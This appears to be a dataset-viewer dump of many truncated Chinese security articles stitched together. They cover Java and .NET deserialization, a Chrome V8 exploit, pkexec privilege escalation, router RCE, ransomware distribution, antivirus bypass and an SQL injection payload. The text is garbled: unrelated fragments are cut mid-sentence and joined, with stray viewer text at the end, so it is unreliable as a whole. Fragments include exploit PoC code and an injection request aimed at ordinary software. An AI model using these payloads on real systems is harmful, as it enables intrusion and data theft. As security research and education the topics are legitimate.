Http反序列化的漏洞,本来是一个正常功能(通过正常调用抓包即可验证确实是正常功能而不是非预期的Post),通过Post传输序列化数据进行远程调用,但是如果Post传递恶意的序列化数据就能进行恶意利用。Apache
Dubbo还支持很多协议,例如Dubbo(Dubbo
Hessian2)、Hessian(包括Hessian与Hessian2,这里的Hessian2与Dubbo
Hessian2不是同一个)、Rmi、... | 社区文章 |
# CanSecWest2017 Pwning Nexus of Every Pixel,Chrome v8部分漏洞利用详解
## bugs
<https://bugs.chromium.org/p/chromium/issues/detail?id=659475>
<https://chromium.googlesource.com/v8/v8/+/2bd7464ec1efc9eb24a38f7400119a5f2257f6e6>
## poc
function Ctor() {
n = new Set();
}
function Check() {
n.xyz = 0x... | 社区文章 |
# 【技术分享】绕过最新补丁,AR红包再遭技术流破解
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
**作者:**[ **ChildZed**
****](http://bobao.360.cn/member/contribute?uid=2606963099)
**预估稿费:400RMB(不服你也来投稿啊!)**
******投稿方式:发送邮件至**[ **linwei#360.cn**](mailto:linwei@360.cn) **,或登陆**[
**网页版**](http://bobao.360.cn/contribute/index) **在线投稿**... | 社区文章 |
# GandCrab勒索软件借助RIG及GrandSoft进行传播
|
##### 译文声明
本文是翻译文章,文章原作者 Malwarebytes Labs,文章来源:blog.malwarebytes.com
原文地址:<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
上周末时,我们发现GandCrab这款新型勒索软件开始粉墨登场。令人惊讶的是,这款恶意软件借助了两款漏洞利用工... | 社区文章 |
**作者:wzt
原文链接:<https://mp.weixin.qq.com/s/G6kE52o7OZaGYPqnuUwggQ>**
### 1 简介
以linux kernel 5.6.7内核代码为例,阐述内核的audit子系统是如何实现的,以及它的一些设计缺陷和绕过方法。
### 2 架构
#### 2.1 总体架构
Linux
audit系统分为用户层和内核层两部分,用户层通过auditctl工具生成rule规则,发送给auditd守护进程,后者通过netlink协议与内核进行交互,包括规则下发等功能。
内核在启动阶段初始化audit子系统时,创建一个netlink
socket,启动audit_receive内核线程处... | 社区文章 |
# 博彩犯罪如何“洗钱”?快捷支付收款码成“帮凶”
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
注册平台,提供自己的收款码
一天就能轻松赚几千至上万
一个月赚几十万,一年赚上百万
真的有这种赚钱方式?暴利背后往往黑灰暗涌!
网络博彩是违法的行为,不法分子为了降低风险和逃避打击,他们借助 **第四方支付平台** 和 **“跑分”平台** 进行资金流转,俗称“洗钱”。
## 安安科普
**第四方支付**
指相对微信支付、支付宝等第三方支付而言,介于第三方支付和商户之间的网络支付平台,没有经营支付结算业务的许可牌照。、
**“跑分”平台**
利用微信或支付宝的收款码,为别人进行代收款,随后赚取佣金。... | 社区文章 |
# 【木马分析】Chrome插件:User–Agent Switcher恶意代码分析报告
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**作者:c1tas@360CERT**
**0x00 背景介绍**
2017年9月9日,在v2ex论坛有用户表示Chrome中名为 **User-Agent Switcher**
的扩展可能存在未授权侵犯用户隐私的恶意行为。因为用户量大,此事引起了广泛关注,360CERT在第一时间对插件进行了分析,并发布了预警<https://cert.360.cn/warning/detail?id=866e27f5a3dd221b506a9bb99e... | 社区文章 |
作者: 菜丝@蚂蚁金服巴斯光年实验室
Electron 是一款基于 Web 技术(HTML5 + Javascript + css)构建图形界面的开发框架,基于 nodejs 和
Chromium 开发。因为无痛兼容 nodejs 包管理(npm)的大量功能丰富的模块,相对于 native
实现降低了开发难度和迭代成本,受到了开发者的青睐。
## 漏洞描述
Electron 近日发布了漏洞 [CVE-2018-1000006](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000006)
的安全公告:<https://electronjs.org/blog/prot... | 社区文章 |
# 漏洞分析
这个漏洞比较nb,现有的所有版本的pkexec都受到影响
polkit是一个授权管理器,其系统架构由授权和身份验证代理组成,pkexec是其中polkit的其中一个工具,他的作用有点类似于sudo,允许用户以另一个用户身份执行命令
## 漏洞原理
来直接看源码吧
挑了个0.120版本的,直接看main函数即可
源码链接:<https://gitlab.freedesktop.org/polkit/polkit/-/blob/0.120/src/programs/pkexec.c>
首先看到534行,这里main函数进来以后,先要对运行pkexec的参数进行处理,n=1被初始化赋值
但如果直接运行pkex... | 社区文章 |
# 以彼之道还施彼身:如何绕过McAfee防护机制
|
##### 译文声明
本文是翻译文章,文章原作者 dmaasland,文章来源:dmaasland.github.io
原文地址:<https://dmaasland.github.io/posts/mcafee.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
在之前的渗透测试中,当我们碰到McAfee Virus Scan
Enterprise(VSE)时都会会心一笑,当时只要简单查询注册表,就能知道管理员创建的扫描例外项。
然而在这次渗透测试中,情况稍微有点复杂,因为目标使用的是McAfee Endpoint
Security。现在McAfe... | 社区文章 |
# Java安全-反序列化篇-URLDNS&cc1-7分析
##### 译文声明
本文是翻译文章,文章原作者 seebug,文章来源:paper.seebug.org
原文地址:<https://paper.seebug.org/1242/>
译文仅供参考,具体内容表达以及含义原文为准。
本篇将以URLDNS以及Commons Collections系列漏洞作为Java反序列化基础篇的练习,仅以巩固对反序列化这类漏洞的理解。
目前已经有很多java反序列化的学习文章供我们学习,所以我算是站在巨人的肩膀上完成了这篇文章,如果有什么错误的地方,欢迎指正,感谢🙏。
下文将以yso代替ysoserial,以cc代替Commons Coll... | 社区文章 |
作者:fenix@知道创宇404实验室
English version: <https://paper.seebug.org/508/>
#### 背景
华为 HG532 系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产品。
2017/11/27,Check Point 软件技术部门报告了一个华为 HG532
产品的远程命令执行漏洞(CVE-2017-17215)[【1】](https://research.checkpoint.com/good-zero-day-skiddie/ "【1】") 。
该漏洞在被报告前,互联网上产生了大量未被关注的此类漏洞攻击利用包,遍及全球多个国家。Payload 已被证实是知名病毒 ... | 社区文章 |
关于wmi的东西,有很多文章参考,这里给自己做一个笔记。
## WMI后门
### wmi基本逻辑结构
wmi的逻辑结构是这样的:
首先是wmi使用者,比如脚本或者其他用到wmi接口的应用程序。由wmi使用者访问CIM对象管理器WinMgmt(即WMI服务),后者再访问CIM(公共信息模型Common
Information Model)存储库。
静态或动态的信息(对象的属性)就保存在CIM库中,同时保存对象的方法。比如启动一个服务,通过执行对象的方法实现,实际上是通过COM技术调用各种dll,最后由dll中封装的API完成请求。WMI是事件驱动的,操作系统、服务、应用程序、设备驱动程序等都可以作为事件源,通过COM接口生成事件... | 社区文章 |
> 翻译文章,原文链接:<https://www.evilsocket.net/2019/05/22/How-to-create-a-Malware-> detection-system-with-Machine-Learning>
在这篇文章中,我们将讨论我喜欢的两个主题,这些主题是过去7年中我(私人)研究的核心要素:机器学习和恶意软件检测。
我受过相当经验性和绝对非学术性的教育,我知道一个热情的开发人员想要接近机器学习并努力理解正式定义,线性代数和诸如此类的东西。因此,我将尽可能保持这种实用性,以便即使是
_受过较少教育_ 的读者也能理解并可能开始使用神经网络。
此外,大部分资源都集中在众所周知的问题上,例如[MNIST数据集]... | 社区文章 |
# 一个土鳖安全工程师的十年奋斗史
##### 译文声明
本文是翻译文章,文章来源:兜哥带你学安全
原文地址:<https://mp.weixin.qq.com/s/uZyRj5jmcVR18_O2saSihQ>
译文仅供参考,具体内容表达以及含义原文为准。
> 2008 年,我是看着《我的华为十年》这篇文章进入这家公司的,当时我的总监就是这篇文章的作者家骏。转眼云烟,第一份工作做到了现在。
## 菜鸟入职
我入职的时候,公司规模远没有现在这么大,北京地区的研发零星分散在中关村的几个写字楼,包括理想国际、普天大厦和银科大厦。
我是在普天大厦入职的,记得当时是 12 月份,第一次冬天来北京的我,领会到了啥叫冰火两重天。
在武汉是没有暖... | 社区文章 |
# 【知识】6月30日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要: rdp攻击手法: **RDPInception** **、** Eternal Champion
Exploit分析、PhantomJS图片渲染XSS漏洞升级为SSRF/Local-File Read、Tomcat 源代码调试 – 看不见的 Shell
第二式之隐藏任意 Jsp 文件 **、** hackerone今年有趣的6个漏洞、初学者的逆向指南:绕过SIGTRAP **、 读取IOS应用程序二进制文件
** **、**** 黑入Virgin Media Supe... | 社区文章 |
### 概述
这两天看到phpcms
v9的注入漏洞,据说还是未曾公开的,但是网上已经有文章给出了分析关于漏洞的原因以及利用方式,漏洞的利用感觉很赞,所以看下并动手验证下这个漏洞。经过分析并结合网上的POC,写了一个检测脚本并本地搭建环境验证如下:
[
### POC
Python检测脚本代码:
#!/usr/bin/env python
# encoding:utf-8
import requests
import urllib
import sys
class Poc():
def __init__(self):
self.cookie={}... | 社区文章 |
Author:剑残雪飘@深蓝攻防实验室
微软安全中心在北京时间3月12日23时发布了影响Windows 10 等系统用户的SMBv3远程代码执行漏洞补丁,本文分析一下本地提权的exp执行流程
## 漏洞原因
漏洞发生在`srv2.sys`中,由于SMB没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法.最终导致整数溢出。
## 漏洞分析
看一下调用过程:
`Srv2ReceiveHandler`调用`Srv2DecompressMessageAsync`
`Srv2DecompressMessageAsync` 调用`Srv2DecompressData`
漏洞在`Srv2D... | 社区文章 |
# 前言
`winafl` 是 `afl` 在 `windows` 的移植版, `winafl` 使用 `dynamorio`
来统计代码覆盖率,并且使用共享内存的方式让 `fuzzer` 知道每个测试样本的覆盖率信息。本文主要介绍 `winafl` 不同于 `afl` 的部分,对于
afl 的变异策略等部分没有介绍,对于 `afl` 的分析可以看
https://paper.seebug.org/496/#arithmetic
# 源码分析
`winafl` 主要分为两个部分 `afl-fuzz.c` 和 `winafl.c` , 前者是 `fuzzer` 的主程序
,后面的是收集程序运行时信息的 `dynamorio` ... | 社区文章 |
**作者:wzt
原文链接:<https://mp.weixin.qq.com/s/LOf_W9QRDds_yHO1aVSg9Q>**
## **1.1** **简介**
XNU的内核内存分配器层次比较多, 因为它是一个混合的内核,bsd、mach层都有自己的内存分配器接口, 但最底层的都是调用zone
allocotr分配器。它的内存分配器设计非常简单,大概是我读过的众多主流os内核中无论数据结构还是分配算法都是最简单的一个。我时常在想XNU内核给MacOS提供了流畅的操作性,但是只从zone的内存分配器来看并不能支撑这个结论,或许慢慢随着笔者对XNU内核的深入理解,答案也会慢慢水落石出。不过本次我们将探讨下zone内存分配器... | 社区文章 |
# 一个存在了17年的漏洞—pppd 栈溢出(cve-2020-8597)漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> H4l0@海特实验室
## 前言
在 3月6号,国外安全研究员 Ilja Van Sprundel(IOActive) 发现了 pppd 组件的 EAP 协议中一个存在了 17
年的严重的栈溢出漏洞,导致所以使用 pppd 组件的系统都受影响,包括 Ubuntu、Debian、Fedora 等,有潜在的远程代码执行的风险,CVSS
评分为 9.8。
## 前置知识
1.EAP 协议概念:
> EAP协议是使用可扩展的身份验证协议的简称,全称Extensible A... | 社区文章 |
# CTF题思考之这题真的做不了吗?
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
最近在进行一些培训讨论,在讲解一道Jarvis OJ上的Web题时,引发了一些思考。
## 起源
思考的起源很简单:
1.大家在网上查看writeup
1.发现题目的预期解法无法复现了
2.大家都认为这道题做不了了
题目链接如下:
[http://web.jarvisoj.com:32782/
](http://web.jarvisoj.com:32782/)
## 预期解法
这里我首先介绍一下预期解法
拿到题目后
一把硕大的菜刀图片,除了管理员登录的link... | 社区文章 |
# 网络小黑揭秘系列之黑色SEO初探
|
##### 译文声明
本文是翻译文章,文章来源:360天眼安全实验室
译文仅供参考,具体内容表达以及含义原文为准。
**引子**
人在做,天在看。
11月底的时候,360天眼安全实验室发布了一篇文章:网络小黑揭秘系列之私服牧马人,揭露了一起污染私服搭建工具和用户登录端程序进行木马传播的事件。其实,类似的案例远不限于此,这次我们揭露另一根链条出来,当然还是从一个样本开始。
**样本及基础设施**
实验室在日常的恶意代码处理时注意到了一个文件名为“YY某主播视频.exe”(MD5:
27C8E69F7241476C58C071E83616D2B5)的远控木马:
基本上,如果是一个国产木马,如果猜... | 社区文章 |
**作者: phith0n
原文链接:<https://mp.weixin.qq.com/s/X04IhY9Oau-kDOVbok8wEw>**
>
> 事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程。本文提到的漏洞《MinIO未授权SSRF漏洞(CVE-2021-21287)》已经修复,也请读者勿使用该漏洞进行未授权测试,否则作者不承担任何责任。
随着工作和生活中的一些环境逐渐往云端迁移,对象存储的需求也逐渐多了起来,MinIO就是一款支持部署在私有云的开源对象存储系统。MinIO完全兼容AWS
S3的协议,也支持作为S3的网关,所以在全球被广泛使用,在Github上已有25k星星。
我平时... | 社区文章 |
渗透时,可能会遇到各种各样的的杀软,但每个杀软特性不同,在绕过前,往往都需要分析,本文就Bitdefender进行分析
最近在研究如何免杀,写了一个马,火绒 360 成功绕过(图有点少,当时没存,火绒测试是用的同学的物理机,两台,还有一台没截图;360是虚拟机)
然后看到Askar大佬的文章,决定试试绕过Bitdenfender,先运行一下,说不定也过了呢(痴心妄想)
结果一运行,连马也给我删了,看看Bitdefender是如何检测的
检查我的exe,通过x64debug去调试:
发现这里竟然多了一个"atcuf64.dll",而且是Bitdefender的,这非常可疑,大概率是来检查我的行为的,很有可能是Hook我的API,这... | 社区文章 |
### 0x08 前台home模块注入漏洞
#### 0x08.1 在线留言处insert sql注入
##### 0x08.1.2 漏洞演示
注:我本地测试的所以我把验证验证码那一步关闭了=-=,实战中请自己加上验证码
url:http://127.0.0.1/cms/PbootCMS-V1.2.1/index.php/Message/add
post:
contacts[content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) );-- a] = 1111
... | 社区文章 |
## 0x01 Запит СБУ.docx文档分析
打开文档后,远程注入模板:
文档内容如下:
翻译后内容如下:
由图标也可以看出:
## 0x02 opt.dot模板分析
模板启用了宏,通过`olevba.py`导出后分析。
获取主机ComputerName及系统磁盘SerialNumber,并通过_拼接:
拼接URL及路径,后续的VBS脚本中会用到:
于启动目录新建一security.vbs:
余下所有都是向该VBS写入内容,不再赘述:
## 0x03 security.vbs分析
监测沙箱(如果沙箱跑25s,那么它此处延时就能达到反沙箱的目的):
余下部分结构如下(其中红色方框部分经过处理):
下面逐一进行分析。
使用XML... | 社区文章 |
**Author:w7ay@Knownsec 404 Team**
**Time: November 20, 2019**
**Chinese version:<https://paper.seebug.org/1078/> **
QL is an object-oriented query language used to retrieve data from relational
database management systems. It supports C/C++, C#, Java, JavaScript, Python
and Go.
I have made simple research on findin... | 社区文章 |
### 前言
* * *
今天在逛论坛时,遇到一个坛友,分享了一个shell过D盾的思路,满好玩的,分析下。
### 原贴
* * *
首先来看下D盾扫描结果。
以前的思路常规,就是定义一个变量b:`$b='';`为空,`$b = null;`,`$b = "\n";`然后变量a: `$a =
$_GET['1'];`,`eval($a.$b);`,或者`eval($b.=$a);` 。但是现在这种方法基本报一级或者直接杀,查出某个变量。
<?php
$m=$_GET['1'];
$a=substr($m,0,1);
$b=substr($m,1,9999);
eval($a.$b);
... | 社区文章 |
# Exchange漏洞分析(二):反序列化代码执行漏洞(CVE-2021–42321)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:雨夜
## 0x00前言
微软公布了一个反序列化代码执行漏洞,[CVE-2021-42321](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321),经过身份认证的攻击者可以通过EWS接口将payload写入UserConfiguration中,并通过GetClientAccessToken触发payload从而在目标服务器上执行代码。本篇通过对POC的跟踪分析漏洞的利用... | 社区文章 |
_web应用防火墙一般部署在web服务器前面,用来过滤来自服务器的恶意流量。如果你被某些公司雇佣为渗透人员,同时他们忘记告诉你他们使用了web应用防火墙,这可能会使你在渗透时遇到极大困阻。下面的插图会向你描述简单的web应用防火墙的原理。_
很明显防火墙就像web流量和web服务器之间的一堵墙,通常现代的web应用防火墙都是基于签名的。
# 什么是基于签名的防火墙
在基于签名的防火墙中,你可以定义签名。因为你知道web攻击遵从着类似的模式或签名。所以我们可以定义匹配模式然后屏蔽攻击。例如:
payload: -<svg><script>alert`1`<p>
上面定义的payload是一种跨站脚本攻击,我们知道所有这种攻击都... | 社区文章 |
## 0x01 LLVM简介
> The LLVM Project is a collection of modular and reusable compiler and
> toolchain technologies.
LLVM是模块化、可重用的编译器以及工具链的集合,有些人把LLVM当成是一个低层的虚拟机(low level virtual
machine),但官方给出的解释是这样的:
> The name "LLVM" itself is not an acronym; it is the full name of the
> project.
也就是说LLVM并不是一个缩写,而是整个项目的全名。
LLVM和传统的编译... | 社区文章 |
**作者:r4v3zn@白帽汇安全研究院
本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!
投稿邮箱:paper@seebug.org **
## 一、背景
通常在渗透的过程中会遇到很多 Weblogic 服务器,但通过 IIOP
协议进行发送序列化恶意代码包时,会面临着无法建立通讯请求发送恶意序列化失败。最近参与了一场在成都举办的《FreeTalk 2020 成都站》,有幸分享了关于
Weblogic IIOP 协议 NAT 绕过的几种方式。
PPT 下载地址:[《Weblogic IIOP 协议NAT
网络绕过》](https://img.zhiiyun.com/Weblogic_IIOP_... | 社区文章 |
**作者:书签收藏家
本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org**
## 前言
目前CodeQL依然是一套不够完善、需要不断改进的代码扫描工具,与市面上成熟的代码扫描工具仍有较大差距。网上CodeQL相关教程大部分只是官方Hello
World教程的汉化版,少部分有价值的文章也只将目光集中在CodeQL语法和QL文件的编写上。这对于分析前不需要进行编译的语言(JavaScript、TypeScript、Python)倒也没有太大影响。但在其他语言中,正确、完整地生成数据库(本文所有数据库均指由CodeQL生成的数据库)与QL文件的编写拥有同等重要的... | 社区文章 |
原文:<http://phrack.org/papers/escaping_the_java_sandbox.html>
在上一篇中,我们不仅回顾了Java沙箱的漏洞简史,介绍了Java平台的两个基本组成部分,同时,还讲解了Java安全管理器和doPrivileged方法。在本文中,我们将为读者介绍基于类型混淆漏洞的沙箱逃逸技术。
**\--[ 3 - 内存破坏漏洞**
* * *
**\----[ 3.1 - 类型混淆漏洞**
* * *
**\------[ 3.1.1 -背景知识**
* * *
在这里,我们介绍的第一种内存破坏漏洞为类型混淆漏洞[13]。实际上,许多Java漏洞都是依赖于类型混淆漏洞来实现沙箱逃避的,如[16... | 社区文章 |
最近打算审一审web项目,毕竟复现一些java的经典漏洞和审计java web还是有些区别的,这次审计的项目地址:
`https://gitee.com/oufu/ofcms`
审计时可以IDEA可以装上`FindBugs`
还是有一些帮助的。
##### 后台任意文件上传
漏洞路径`/ofcms/ofcms-admin/src/main/java/com/ofsoft/cms/admin/controller/cms/TemplateController.java`
public void save() {
String resPath = getPara("res_path");
... | 社区文章 |
这是我开始学习堆不久后对于一些知识点和CTF题型的总结,希望能帮助到更多的初学者入门二进制安全,大家可以一起打PWN交流,题目和exp我放在附件,下面直接进入正题:
### 一、源码介绍:
#### 当需要合并相邻的freechunk时用到unlink:
1、向后合并:
#!c
/*malloc.c int_free函数中*/
/*这里p指向当前malloc_chunk结构体,bck和fwd分别为当前chunk的向后和向前一个free chunk*/
/* consolidate backward */
if (!prev_inuse(p)) {
prev... | 社区文章 |
# 从TCTF的3rm1学习java动态代理
## 关于java代理
> 代理模式是常用的 java
> 设计模式,他的特征是代理类与委托类有同样的接口,代理类主要负责为委托类预处理消息、过滤消息、把消息转发给委托类,以及事后处理消息等。代理类与委托类之间通常会存在关联关系,一个代理类的对象与一个委托类的对象关联,代理类的对象本身并不真正实现服务,而是通过调用委托类的对象的相关方法,来提供特定的服务。
这里需要关注的重点有如下几点
* 代理类与委托类有同样的接口
* 代理类主要负责为委托类预处理消息、过滤消息等简而言之经过代理的类方法被调用后会先经过代理类的处理。
* 一个代理类的对象与一个委托类的对象关联
从这里你能够... | 社区文章 |
>
> 很多技术研发不了解安全,也不重视安全,只有在自己的服务器被黑掉、被挂马、被脱裤才想起关注安全,但是这个时候,技术架构已经成型、代码已经在线上稳定运行,再亡羊补牢,改代码、改策略,往往成本巨大、而收效很低;所以,开发安全,从娃娃抓起……
## 一、什么是信息安全?
信息安全是一个庞大的概念,包含大量不同方向的分支技术,但是都涉及几个概念:
* `机密性(Confidentiality)`:即保证信息在产生、传输、存储、使用等环节不会被泄漏、被恶意窃取。在技术上典型的实现方式就是加密算法。加密算法主要分对称加密和非对称加密,对称加密的加解密密钥是一样的,所以在密钥在存储、传输时会有一定泄漏的风险,但加解密效率会相对高一些... | 社区文章 |
作者:[
**Janes**](https://3wapp.github.io/2017/05/05/Jenkins-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2017-1000353/)
## 漏洞概要
Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins
CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行。
## 漏洞触发执行流... | 社区文章 |
## 利用域名碰撞实现从任何地方发起中间人攻击
相比大家对中间人劫持的攻击相当了解,尤其是局域网中的中间人攻击。有很多的利用手段比如ARP投毒、DNS投毒、ICMP重定向等等,这类的文章在网上非常的多。但是今天要讨论的是一个全新的中间人攻击方式,这种方式在近几年的顶会论文中被研究。这种中间人攻击条件一旦具备,攻击者可以从任何地方对网络发起中间人劫持。
在这篇文章里我将总结和分析这类攻击的原理,并列举目前网络上存在这些漏洞的服务应用。最后讨论一下作为软件开发人员应该怎么去防范这类攻击。
### 背景知识
在很多私有网络环境里会使用许多私有的域名后缀比如.ntld等等。在ICANN(The Internet Corporation fo... | 社区文章 |
文章为翻译稿件,翻译自:https://blog.talosintelligence.com/2018/10/anatomy-of-sextortion-scam.html
自今年7月以来,攻击者越来越多地在互联网上进行sextortion型攻击。思科Talos在过去几个月对这些活动进行持续的关注。在许多情况下,恶意邮件发送者从泄露的公开可用的数据中盗取电子邮件地址和密码,然后使用这些数据来帮助他们进行sextortion攻击。实际上攻击者没有将他们进行对目标进行攻击的视频放到网上,但是如果受害者在一定时间内没有支付赎金,那攻击者将会发送电子邮件告诉受害者他们会将隐私视频内容放到网上。其中包括收件人的密码以及他们的付款要求,并且攻击... | 社区文章 |
# 【技术分享】如何黑掉一个无人机?已知无人机漏洞&利用工具汇总(附演示视频)
|
##### 译文声明
本文是翻译文章,文章来源:swalters
原文地址:<https://medium.com/@swalters/how-can-drones-be-hacked-the-updated-list-of-vulnerable-drones-attack-tools-dd2e006d6809#.2z0x0s65l>
译文仅供参考,具体内容表达以及含义原文为准。
****
**翻译:**[ **mryu1**](http://bobao.360.cn/member/contribute?uid=2779928186)
**稿费:90... | 社区文章 |
# 分析和学习WordPress<=5.7 XXE漏洞
## 0x0 前言
这个洞是新爆出来的,漏洞成因可以说是有点奇葩的,但正是这样导致很多人没发现,同时利用过程也是有一丢丢的复杂,下面是我分析和学习过程,希望能给大家带来一点启发。
## 0x1 漏洞简介
影响范围: WordPress <= 5.7 && php8
类型: Blind XXE
严重程度: 中高
关于PHP8局限范围的一些解读:
> 每个PHP的主要版本生命周期一般为2年(超过这个时间后官方不再维护更新),PHP 7.4于2019年11月发布,作为PHP 7的最终版本,这意味着PHP
> 7.4要到2022年11月份才会走到它的“生命尽头”。也就是说,到2022年... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.